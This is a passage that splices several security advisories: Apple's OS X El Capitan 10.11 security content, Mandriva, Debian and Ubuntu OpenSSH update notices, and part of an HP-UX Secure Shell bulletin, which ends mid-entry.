Multiple vulnerabilities in PHP\nDescription: Multiple vulnerabilities existed in PHP versions prior\nto 5.5.27, including one which may have led to remote code execution. \nThis issue was addressed by updating PHP to version 5.5.27. \nCVE-ID\nCVE-2014-9425\nCVE-2014-9427\nCVE-2014-9652\nCVE-2014-9705\nCVE-2014-9709\nCVE-2015-0231\nCVE-2015-0232\nCVE-2015-0235\nCVE-2015-0273\nCVE-2015-1351\nCVE-2015-1352\nCVE-2015-2301\nCVE-2015-2305\nCVE-2015-2331\nCVE-2015-2348\nCVE-2015-2783\nCVE-2015-2787\nCVE-2015-3329\nCVE-2015-3330\n\nApple Online Store Kit\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious application may gain access to a user\u0027s keychain\nitems\nDescription: An issue existed in validation of access control lists\nfor iCloud keychain items. This issue was addressed through improved\naccess control list checks. \nCVE-ID\nCVE-2015-5836 : XiaoFeng Wang of Indiana University, Luyi Xing of\nIndiana University, Tongxin Li of Peking University, Tongxin Li of\nPeking University, Xiaolong Bai of Tsinghua University\n\nAppleEvents\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A user connected through screen sharing can send Apple\nEvents to a local user\u0027s session\nDescription: An issue existed with Apple Event filtering that\nallowed some users to send events to other users. This was addressed\nby improved Apple Event handling. \nCVE-ID\nCVE-2015-5849 : Jack Lawrence (@_jackhl)\n\nAudio\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Playing a malicious audio file may lead to an unexpected\napplication termination\nDescription: A memory corruption issue existed in the handling of\naudio files. This issue issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-5862 : YoungJin Yoon of Information Security Lab. (Adv.:\nProf. Taekyoung Kwon), Yonsei University, Seoul, Korea\n\nbash\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Multiple vulnerabilities in bash\nDescription: Multiple vulnerabilities existed in bash versions prior\nto 3.2 patch level 57. These issues were addressed by updating bash\nversion 3.2 to patch level 57. \nCVE-ID\nCVE-2014-6277\nCVE-2014-7186\nCVE-2014-7187\n\nCertificate Trust Policy\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Update to the certificate trust policy\nDescription: The certificate trust policy was updated. The complete\nlist of certificates may be viewed at https://support.apple.com/en-\nus/HT202858. \n\nCFNetwork Cookies\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker in a privileged network position can track a\nuser\u0027s activity\nDescription: A cross-domain cookie issue existed in the handling of\ntop level domains. The issue was address through improved\nrestrictions of cookie creation. \nCVE-ID\nCVE-2015-5885 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua\nUniversity\n\nCFNetwork FTPProtocol\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Malicious FTP servers may be able to cause the client to\nperform reconnaissance on other hosts\nDescription: An issue existed in the handling of FTP packets when\nusing the PASV command. This issue was resolved through improved\nvalidation. \nCVE-ID\nCVE-2015-5912 : Amit Klein\n\nCFNetwork HTTPProtocol\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A maliciously crafted URL may be able to bypass HSTS and\nleak sensitive data\nDescription: A URL parsing vulnerability existed in HSTS handling. \nThis issue was addressed through improved URL parsing. \nCVE-ID\nCVE-2015-5858 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua\nUniversity\n\nCFNetwork HTTPProtocol\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious website may be able to track users in Safari\nprivate browsing mode\nDescription: An issue existed in the handling of HSTS state in\nSafari private browsing mode. This issue was addressed through\nimproved state handling. \nCVE-ID\nCVE-2015-5860 : Sam Greenhalgh of RadicalResearch Ltd\n\nCFNetwork Proxies\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Connecting to a malicious web proxy may set malicious\ncookies for a website\nDescription: An issue existed in the handling of proxy connect\nresponses. This issue was addressed by removing the set-cookie header\nwhile parsing the connect response. \nCVE-ID\nCVE-2015-5841 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua\nUniversity\n\nCFNetwork SSL\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker with a privileged network position may intercept\nSSL/TLS connections\nDescription: A certificate validation issue existed in NSURL when a\ncertificate changed. This issue was addressed through improved\ncertificate validation. \nCVE-ID\nCVE-2015-5824 : Timothy J. Wood of The Omni Group\n\nCFNetwork SSL\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker may be able to decrypt data protected by SSL\nDescription: There are known attacks on the confidentiality of RC4. \nAn attacker could force the use of RC4, even if the server preferred\nbetter ciphers, by blocking TLS 1.0 and higher connections until\nCFNetwork tried SSL 3.0, which only allows RC4. This issue was\naddressed by removing the fallback to SSL 3.0. \n\nCoreCrypto\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker may be able to determine a private key\nDescription: By observing many signing or decryption attempts, an\nattacker may have been able to determine the RSA private key. This\nissue was addressed using improved encryption algorithms. \n\nCoreText\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-5874 : John Villamil (@day6reak), Yahoo Pentest Team\n\nDev Tools\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in dyld. This was\naddressed through improved memory handling. \nCVE-ID\nCVE-2015-5876 : beist of grayhash\n\nDev Tools\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An application may be able to bypass code signing\nDescription: An issue existed with validation of the code signature\nof executables. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-5839 : @PanguTeam\n\nDisk Images\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A memory corruption issue existed in DiskImages. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5847 : Filippo Bigarella, Luca Todesco\n\ndyld\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An application may be able to bypass code signing\nDescription: An issue existed with validation of the code signature\nof executables. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-5839 : TaiG Jailbreak Team\n\nEFI\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious application can prevent some systems from\nbooting\nDescription: An issue existed with the addresses covered by the\nprotected range register. This issue was fixed by changing the\nprotected range. \nCVE-ID\nCVE-2015-5900 : Xeno Kovah \u0026 Corey Kallenberg from LegbaCore\n\nEFI\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious Apple Ethernet Thunderbolt adapter may be able\nto affect firmware flashing\nDescription: Apple Ethernet Thunderbolt adapters could modify the\nhost firmware if connected during an EFI update. This issue was\naddressed by not loading option ROMs during updates. \nCVE-ID\nCVE-2015-5914 : Trammell Hudson of Two Sigma Investments and snare\n\nFinder\nAvailable for: Mac OS X v10.6.8 and later\nImpact: The \"Secure Empty Trash\" feature may not securely delete\nfiles placed in the Trash\nDescription: An issue existed in guaranteeing secure deletion of\nTrash files on some systems, such as those with flash storage. This\nissue was addressed by removing the \"Secure Empty Trash\" option. \nCVE-ID\nCVE-2015-5901 : Apple\n\nGame Center\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious Game Center application may be able to access a\nplayer\u0027s email address\nDescription: An issue existed in Game Center in the handling of a\nplayer\u0027s email. This issue was addressed through improved access\nrestrictions. \nCVE-ID\nCVE-2015-5855 : Nasser Alnasser\n\nHeimdal\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker may be able to replay Kerberos credentials to\nthe SMB server\nDescription: An authentication issue existed in Kerberos\ncredentials. This issue was addressed through additional validation\nof credentials using a list of recently seen credentials. \nCVE-ID\nCVE-2015-5913 : Tarun Chopra of Microsoft Corporation, U.S. and Yu\nFan of Microsoft Corporation, China\n\nICU\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Multiple vulnerabilities in ICU\nDescription: Multiple vulnerabilities existed in ICU versions prior\nto 53.1.0. These issues were addressed by updating ICU to version\n55.1. \nCVE-ID\nCVE-2014-8146\nCVE-2014-8147\nCVE-2015-5922\n\nInstall Framework Legacy\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to gain root privileges\nDescription: A restriction issue existed in the Install private\nframework containing a privileged executable. This issue was\naddressed by removing the executable. \nCVE-ID\nCVE-2015-5888 : Apple\n\nIntel Graphics Driver\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: Multiple memory corruption issues existed in the Intel\nGraphics Driver. These issues were addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-5830 : Yuki MIZUNO (@mzyy94)\nCVE-2015-5877 : Camillus Gerard Cai\n\nIOAudioFamily\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An issue existed in IOAudioFamily that led to the\ndisclosure of kernel memory content. This issue was addressed by\npermuting kernel pointers. \nCVE-ID\nCVE-2015-5864 : Luca Todesco\n\nIOGraphics\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues existed in the\nkernel. These issues were addressed through improved memory handling. \nCVE-ID\nCVE-2015-5871 : Ilja van Sprundel of IOActive\nCVE-2015-5872 : Ilja van Sprundel of IOActive\nCVE-2015-5873 : Ilja van Sprundel of IOActive\nCVE-2015-5890 : Ilja van Sprundel of IOActive\n\nIOGraphics\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in IOGraphics which could have led to\nthe disclosure of kernel memory layout. This issue was addressed\nthrough improved memory management. \nCVE-ID\nCVE-2015-5865 : Luca Todesco\n\nIOHIDFamily\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: Multiple memory corruption issues existed in\nIOHIDFamily. These issues were addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-5866 : Apple\nCVE-2015-5867 : moony li of Trend Micro\n\nIOStorageFamily\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local attacker may be able to read kernel memory\nDescription: A memory initialization issue existed in the kernel. \nThis issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5863 : Ilja van Sprundel of IOActive\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues existed in the\nKernel. These issues were addressed through improved memory handling. \nCVE-ID\nCVE-2015-5868 : Cererdlong of Alibaba Mobile Security Team\nCVE-2015-5896 : Maxime Villard of m00nbsd\nCVE-2015-5903 : CESG\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local process can modify other processes without\nentitlement checks\nDescription: An issue existed where root processes using the\nprocessor_set_tasks API were allowed to retrieve the task ports of\nother processes. This issue was addressed through additional\nentitlement checks. \nCVE-ID\nCVE-2015-5882 : Pedro Vilaca, working from original research by\nMing-chieh Pan and Sung-ting Tsai; Jonathan Levin\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local attacker may control the value of stack cookies\nDescription: Multiple weaknesses existed in the generation of user\nspace stack cookies. These issues were addressed through improved\ngeneration of stack cookies. \nCVE-ID\nCVE-2013-3951 : Stefan Esser\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker may be able to launch denial of service attacks\non targeted TCP connections without knowing the correct sequence\nnumber\nDescription: An issue existed in xnu\u0027s validation of TCP packet\nheaders. This issue was addressed through improved TCP packet header\nvalidation. \nCVE-ID\nCVE-2015-5879 : Jonathan Looney\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker in a local LAN segment may disable IPv6 routing\nDescription: An insufficient validation issue existed in the\nhandling of IPv6 router advertisements that allowed an attacker to\nset the hop limit to an arbitrary value. This issue was addressed by\nenforcing a minimum hop limit. \nCVE-ID\nCVE-2015-5869 : Dennis Spindel Ljungmark\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An issue existed that led to the disclosure of kernel\nmemory layout. This was addressed through improved initialization of\nkernel memory structures. \nCVE-ID\nCVE-2015-5842 : beist of grayhash\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An issue existed in debugging interfaces that led to\nthe disclosure of memory content. This issue was addressed by\nsanitizing output from debugging interfaces. \nCVE-ID\nCVE-2015-5870 : Apple\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to cause a system denial of service\nDescription: A state management issue existed in debugging\nfunctionality. This issue was addressed through improved validation. \nCVE-ID\nCVE-2015-5902 : Sergi Alvarez (pancake) of NowSecure Research Team\n\nlibc\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2014-8611 : Adrian Chadd and Alfred Perlstein of Norse\nCorporation\n\nlibpthread\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5899 : Lufeng Li of Qihoo 360 Vulcan Team\n\nlibxpc\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Many SSH connections could cause a denial of service\nDescription: launchd had no limit on the number of processes that\ncould be started by a network connection. This issue was addressed by\nlimiting the number of SSH processes to 40. \nCVE-ID\nCVE-2015-5881 : Apple\n\nLogin Window\nAvailable for: Mac OS X v10.6.8 and later\nImpact: The screen lock may not engage after the specified time\nperiod\nDescription: An issue existed with captured display locking. The\nissue was addressed through improved lock handling. \nCVE-ID\nCVE-2015-5833 : Carlos Moreira, Rainer Dorau of rainer dorau\ninformationsdesign, Chris Nehren, Kai Takac, Hans Douma, Toni\nVaahtera, and an anonymous researcher\n\nlukemftpd\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A remote attacker may be able to deny service to the FTP\nserver\nDescription: A glob-processing issue existed in tnftpd. This issue\nwas addressed through improved glob validation. \nCVE-ID\nCVE-2015-5917 : Maksymilian Arciemowicz of cxsecurity.com\n\nMail\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Printing an email may leak sensitive user information\nDescription: An issue existed in Mail which bypassed user\npreferences when printing an email. This issue was addressed through\nimproved user preference enforcement. \nCVE-ID\nCVE-2015-5881 : Owen DeLong of Akamai Technologies, Noritaka Kamiya,\nDennis Klein from Eschenburg, Germany, Jeff Hammett of Systim\nTechnology Partners\n\nMail\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker in a privileged network position may be able to\nintercept attachments of S/MIME-encrypted e-mail sent via Mail Drop\nDescription: An issue existed in handling encryption parameters for\nlarge email attachments sent via Mail Drop. The issue is addressed by\nno longer offering Mail Drop when sending an encrypted e-mail. \nCVE-ID\nCVE-2015-5884 : John McCombs of Integrated Mapping Ltd\n\nMultipeer Connectivity\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local attacker may be able to observe unprotected\nmultipeer data\nDescription: An issue existed in convenience initializer handling in\nwhich encryption could be actively downgraded to a non-encrypted\nsession. This issue was addressed by changing the convenience\ninitializer to require encryption. \nCVE-ID\nCVE-2015-5851 : Alban Diquet (@nabla_c0d3) of Data Theorem\n\nNetworkExtension\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An uninitialized memory issue in the kernel led to the\ndisclosure of kernel memory content. This issue was addressed through\nimproved memory initialization. \nCVE-ID\nCVE-2015-5831 : Maxime Villard of m00nbsd\n\nNotes\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to leak sensitive user information\nDescription: An issue existed in parsing links in the Notes\napplication. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-5878 : Craig Young of Tripwire VERT, an anonymous researcher\n\nNotes\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to leak sensitive user information\nDescription: A cross-site scripting issue existed in parsing text by\nthe Notes application. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2015-5875 : xisigr of Tencent\u0027s Xuanwu LAB (www.tencent.com)\n\nOpenSSH\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Multiple vulnerabilities in OpenSSH\nDescription: Multiple vulnerabilities existed in OpenSSH versions\nprior to 6.9. These issues were addressed by updating OpenSSH to\nversion 6.9. \nCVE-ID\nCVE-2014-2532\n\nOpenSSL\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Multiple vulnerabilities in OpenSSL\nDescription: Multiple vulnerabilities existed in OpenSSL versions\nprior to 0.9.8zg. These were addressed by updating OpenSSL to version\n0.9.8zg. \nCVE-ID\nCVE-2015-0286\nCVE-2015-0287\n\nprocmail\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Multiple vulnerabilities in procmail\nDescription: Multiple vulnerabilities existed in procmail versions\nprior to 3.22. These issues were addressed by removing procmail. \nCVE-ID\nCVE-2014-3618\n\nremote_cmds\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with root\nprivileges\nDescription: An issue existed in the usage of environment variables\nby the rsh binary. This issue was addressed by dropping setuid\nprivileges from the rsh binary. \nCVE-ID\nCVE-2015-5889 : Philip Pettersson\n\nremovefile\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Processing malicious data may lead to unexpected application\ntermination\nDescription: An overflow fault existed in the checkint division\nroutines. This issue was addressed with improved division routines. \nCVE-ID\nCVE-2015-5840 : an anonymous researcher\n\nRuby\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Multiple vulnerabilities in Ruby\nDescription: Multiple vulnerabilities existed in Ruby versions prior\nto 2.0.0p645. These were addressed by updating Ruby to version\n2.0.0p645. \nCVE-ID\nCVE-2014-8080\nCVE-2014-8090\nCVE-2015-1855\n\nSecurity\nAvailable for: Mac OS X v10.6.8 and later\nImpact: The lock state of the keychain may be incorrectly displayed\nto the user\nDescription: A state management issue existed in the way keychain\nlock status was tracked. This issue was addressed through improved\nstate management. \nCVE-ID\nCVE-2015-5915 : Peter Walz of University of Minnesota, David Ephron,\nEric E. Lawrence, Apple\n\nSecurity\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A trust evaluation configured to require revocation checking\nmay succeed even if revocation checking fails\nDescription: The kSecRevocationRequirePositiveResponse flag was\nspecified but not implemented. This issue was addressed by\nimplementing the flag. \nCVE-ID\nCVE-2015-5894 : Hannes Oud of kWallet GmbH\n\nSecurity\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A remote server may prompt for a certificate before\nidentifying itself\nDescription: Secure Transport accepted the CertificateRequest\nmessage before the ServerKeyExchange message. This issue was\naddressed by requiring the ServerKeyExchange first. \nCVE-ID\nCVE-2015-5887 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine\nDelignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of\nINRIA Paris-Rocquencourt, and Cedric Fournet and Markulf Kohlweiss of\nMicrosoft Research, Pierre-Yves Strub of IMDEA Software Institute\n\nSMB\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5891 : Ilja van Sprundel of IOActive\n\nSMB\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An issue existed in SMBClient that led to the\ndisclosure of kernel memory content. This issue was addressed through\nimproved bounds checking. \nCVE-ID\nCVE-2015-5893 : Ilja van Sprundel of IOActive\n\nSQLite\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Multiple vulnerabilities in SQLite v3.8.5\nDescription: Multiple vulnerabilities existed in SQLite v3.8.5. \nThese issues were addressed by updating SQLite to version 3.8.10.2. \nCVE-ID\nCVE-2015-3414\nCVE-2015-3415\nCVE-2015-3416\n\nTelephony\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local attacker can place phone calls without the user\u0027s\nknowledge when using Continuity\nDescription: An issue existed in the authorization checks for\nplacing phone calls. This issue was addressed through improved\nauthorization checks. \nCVE-ID\nCVE-2015-3785 : Dan Bastone of Gotham Digital Science\n\nTerminal\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Maliciously crafted text could mislead the user in Terminal\nDescription: Terminal did not handle bidirectional override\ncharacters in the same way when displaying text and when selecting\ntext. This issue was addressed by suppressing bidirectional override\ncharacters in Terminal. \nCVE-ID\nCVE-2015-5883 : an anonymous researcher\n\ntidy\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: Multiple memory corruption issues existed in tidy. \nThese issues were addressed through improved memory handling. \nCVE-ID\nCVE-2015-5522 : Fernando Munoz of NULLGroup.com\nCVE-2015-5523 : Fernando Munoz of NULLGroup.com\n\nTime Machine\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local attacker may gain access to keychain items\nDescription: An issue existed in backups by the Time Machine\nframework. This issue was addressed through improved coverage of Time\nMachine backups. \nCVE-ID\nCVE-2015-5854 : Jonas Magazinius of Assured AB\n\nNote: OS X El Capitan 10.11 includes the security content of\nSafari 9: https://support.apple.com/kb/HT205265. \n\nOS X El Capitan 10.11 may be obtained from the Mac App Store:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBCAAGBQJWDB2wAAoJEBcWfLTuOo7t0sYP/2L3JOGPkHH8XUh2YHpu5qaw\nS5F2v+SRpWleKQBVsGZ7oA8PV0rBTzEkzt8K1tNxYmxEqL9f/TpRiGoforn89thO\n/hOtmVOfUcBjPZ4XKwMVzycfSMC9o6LxWTLEKDVylE+F+5jkXafOC9QaqD11dxX6\nQhENkpS1BwrKhyaSVxEcgBQtZM9aTsVdZ78rTCb9XTn6gDnvs8NfIQquFOnaQT54\nYJ36e5UcUsnyBIol+yGDbC3ZEhzSVIGE5/8/NFlFfRXLgnJArxD8lqz8WdfU9fop\nhpT/dDqqAdYbRcW1ihcG1haiNHgP9yQCY5jRNfttb+Tc/kIi/QmPkEO0QS8Ygt/O\nc3sUbNulr1LCinymFVwx16CM1DplGS/GmBL18BAEBnL6yi9tEhYDynZWLSEa37VR\n8q802rXRSF10Wct9/kEeR4HgY/1k0KK/4Uddm3c0YyOU21ya7NAhoHGwmDa9g11r\nN1TniOK8tPiCGjRNOJwuF6DKxD9L3Fv44bVlxAarGUGYkICqzaNS+bgKI1aQNahT\nfJ91x5uKD4+L9v9c5slkoDIvWqIhO9oyuxgnmC5GstkwFplFXSOklLkTktjLGNn1\nnJq8cPnZ/3E1RXTEwVhGljYw5pdZHNx98XmLomGrPqVlZfjGURK+5AXdf2pOlt2e\ng6jld/w5tPuCFhGucE7Z\n=XciV\n-----END PGP SIGNATURE-----\n. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2532\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2653\n http://advisories.mageia.org/MGASA-2014-0143.html\n http://advisories.mageia.org/MGASA-2014-0166.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n 753bd40deb60429adc6a7c1afd63ee3d mbs1/x86_64/openssh-5.9p1-6.3.mbs1.x86_64.rpm\n 377e7fbb14f72a1e32da41f19be7baa8 mbs1/x86_64/openssh-askpass-5.9p1-6.3.mbs1.x86_64.rpm\n a906db623fc8d56eab9b8b99b1af84d9 mbs1/x86_64/openssh-askpass-common-5.9p1-6.3.mbs1.x86_64.rpm\n 9fc03d4929efdf21a26aef308eb66f14 mbs1/x86_64/openssh-askpass-gnome-5.9p1-6.3.mbs1.x86_64.rpm\n f2dbea4a0a8109bc835c69e871f07a69 mbs1/x86_64/openssh-clients-5.9p1-6.3.mbs1.x86_64.rpm\n a20d329b8332ff7f7f10dd541a3865a9 mbs1/x86_64/openssh-server-5.9p1-6.3.mbs1.x86_64.rpm \n 0fd2c0a9338a7e8e8747c2ea3ae43c49 mbs1/SRPMS/openssh-5.9p1-6.3.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2014-2532\n\n Jann Horn discovered that OpenSSH incorrectly handled wildcards in\n AcceptEnv lines. \n\nCVE-2014-2653\n\n Matthew Vernon reported that if a SSH server offers a\n HostCertificate that the ssh client doesn\u0027t accept, then the client\n doesn\u0027t check the DNS for SSHFP records. As a consequence a\n malicious server can disable SSHFP-checking by presenting a\n certificate. \n\n Note that a host verification prompt is still displayed before\n connecting. \n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:5.5p1-6+squeeze5. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1:6.0p1-4+deb7u1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:6.6p1-1. \n\nWe recommend that you upgrade your openssh packages. ============================================================================\nUbuntu Security Notice USN-2155-1\nMarch 25, 2014\n\nopenssh vulnerability\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 13.10\n- Ubuntu 12.10\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nOpenSSH incorrectly handled environment restrictions with wildcards. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 13.10:\n openssh-server 1:6.2p2-6ubuntu0.2\n\nUbuntu 12.10:\n openssh-server 1:6.0p1-3ubuntu1.1\n\nUbuntu 12.04 LTS:\n openssh-server 1:5.9p1-5ubuntu1.2\n\nUbuntu 10.04 LTS:\n openssh-server 1:5.3p1-3ubuntu7.1\n\nIn general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04499681\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04499681\nVersion: 1\n\nHPSBUX03188 SSRT101487 rev.1 - HP-UX running HP Secure Shell, Remote Denial\nof Service (DoS) and other Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-11-07\nLast Updated: 2014-11-07\n\nPotential Security Impact: Remote Denial of Service (DoS) and other\nvulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP-UX running HP\nSecure Shell. These vulnerabilities could be exploited remotely to create a\nDenial of Service (DoS) and other vulnerabilities. \n\nReferences:\n\nCVE-2013-4548 - remote Permissions, Privileges, and Access Control (CWE-264)\n\nCVE-2014-1692 - remote Denial of Service (DoS), Buffer Errors (CWE-119)\n\nCVE-2014-2532 - remote Permissions, Privileges, and Access Control (CWE-264)\n\nCVE-2014-2653 - remote Input Validation (CWE-20)\n\nSSRT101487\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11 running HP Secure Shell before version A.06.20.010\n\nHP-UX B.11.23 running HP Secure Shell before version A.06.20.011\n\nHP-UX B.11.31 running HP Secure Shell before version A.06.20.012\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2013-4548 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\nCVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2532 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8\nCVE-2014-2653 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following software updates to resolve this vulnerability. \nThe updates are available for download from:\nhttp://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=\nT1471AA\n\nOS Release\n HP Secure Shell Version\n Depot Name\n\nHP-UX B.11.11 (11i v1)\n A.06.20.010 or subsequent\n HP_UX_11i_v1_T1471AA_A.06.20.010_HP-UX_B.11.11_32_64.depot\n\nHP-UX B.11.23 (11i v2)\n A.06.20.011 or subsequent\n HP_UX_11i_v2_T1471AA_A.06.20.011_HP-UX_B.11.23_IA_PA.depot\n\nHP-UX B.11.31 (11i v3)\n A.06.20.012 or subsequent\n HP_UX_11i_v3_SecureShell_A.06.20.012_HP-UX_B.11.31_IA_PA.depot\n\nMANUAL ACTIONS: Yes - Update\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant:\nHP-UX Software Assistant is an enhanced application that replaces HP-UX\nSecurity Patch Check. It analyzes all HP-issued Security Bulletins and lists\nrecommended actions that may apply to a specific HP-UX system. It can also\ndownload patches and create a depot automatically. For more information see:\nhttps://www.hp.com/go/swa\n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\n==============\nSecure_Shell.SECURE_SHELL\naction: install revision A.06.20.010 or subsequent\n\nHP-UX B.11.23\n==============\nSecure_Shell.SECSH-CMN\nSecure_Shell.SECURE_SHELL\naction: 